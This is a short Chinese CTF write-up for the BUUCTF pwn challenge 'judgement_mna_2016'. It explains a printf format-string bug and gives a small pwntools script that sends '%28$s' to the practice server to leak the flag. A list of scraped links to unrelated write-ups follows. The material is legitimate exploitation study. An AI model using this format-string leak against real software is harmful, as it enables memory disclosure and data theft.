这题本身比较简单,但是增强了一丝丝漏洞意识


看到flag在文中又看到printf显然想到格式化字符串漏洞泄露内存,,,
关键是计算偏移:这里我再次分别利用ubuntu21 和ubuntu 16都gdb调试了一下,发现ubuntu21的调试偏移计算结果不一样,,,,,离谱之。

from pwn import*
p=remote('node4.buuoj.cn',28336)
payload="%28$s"
p.sendlineafter("flag >>",payload)
p.interactive()

BUUCTF之“judgement_mna_2016”相关推荐

  1. [BUUCTF]PWN——judgement_mna_2016(32位fmt)

    judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的 ...

  2. BUUCTF的Web真题学习整理(一)

    目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...

  3. [BUUCTF-pwn]——judgement_mna_2016

    [BUUCTF-pwn]--judgement_mna_2016 还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试. 一看就知道这个地方储存的flag, ...

  4. BUUCTF寒假刷题-Web

    前言 寒假横向刷题(尽量) BUUCTF

  5. BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过

    BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...

  6. BUUCTF刷题笔记

    BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...

  7. BUUCTF Quoted-printable编码

    Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...

  8. BUUCTF NewStarCTF一些新知识记录

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...

  9. buuctf Mark loves cat

    buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...

最新文章

  1. GCC中同时使用动态和静态库链接的编译
  2. java pdf水印排布问题_Java实现pdf文件添加水印,铺满全页。
  3. ABAP ALV检查单元格更新数据
  4. Python爬虫开发:post请求(用户登录)
  5. Apache Tomcat Configuration Reference
  6. http协议与web本质
  7. 小小c语言贪吃蛇思路,【图片】C语言小游戏~贪吃蛇【c语言吧】_百度贴吧
  8. linux 进程0 写时复制,linux 写时复制 COW 过程梳理
  9. 关于CodeReview
  10. SQLSERVER中如何快速比较两张表的不一样
  11. VC Studio集成开发环境下编译Apache--jin点滴实验手记
  12. CBD将建智慧城市管理平台
  13. Java 学生成绩管理系统(基于GUI和数据库的建立)
  14. 中国象棋matlab
  15. RIP总结(转自鸿鹄论坛)
  16. 由pushViewController说起可能出线的各种死法
  17. Windows上必备的7个国产小众软件,每一个都是良心推荐,建议常备使用哦。
  18. 深度揭秘:到底什么是“授时”
  19. 建立统一标准的教育大数据
  20. 易语言 如何调用麦谈帮API接口?

热门文章

  1. 联想x3300 m4服务器维修,【联想x3300 M4参数】联想x3300 M4系列服务器参数-ZOL中关村在线...
  2. 谷歌生物医学专用翻译_[Windows]学生党福利,文献翻译神器,附有生物医学专用引擎哦!...
  3. Java学习参考书籍
  4. 二零一五,谁偷走了我的青春
  5. Android okHttp封装库(2) -- okhttp-OkGo
  6. 笨拙的手指 代码优化版
  7. 三角形加几笔能变成什么_一个圆添上几笔能出来什么形状?例如:表,太阳,向日葵.-圆形加几笔得什么事物-数学-伍靖都同学...
  8. 国科大学习资料--最优化计算方法(王晓)--第七次作业答案
  9. The Biggest Water Problem
  10. access quick 取消显示_如何清除 windows中quick access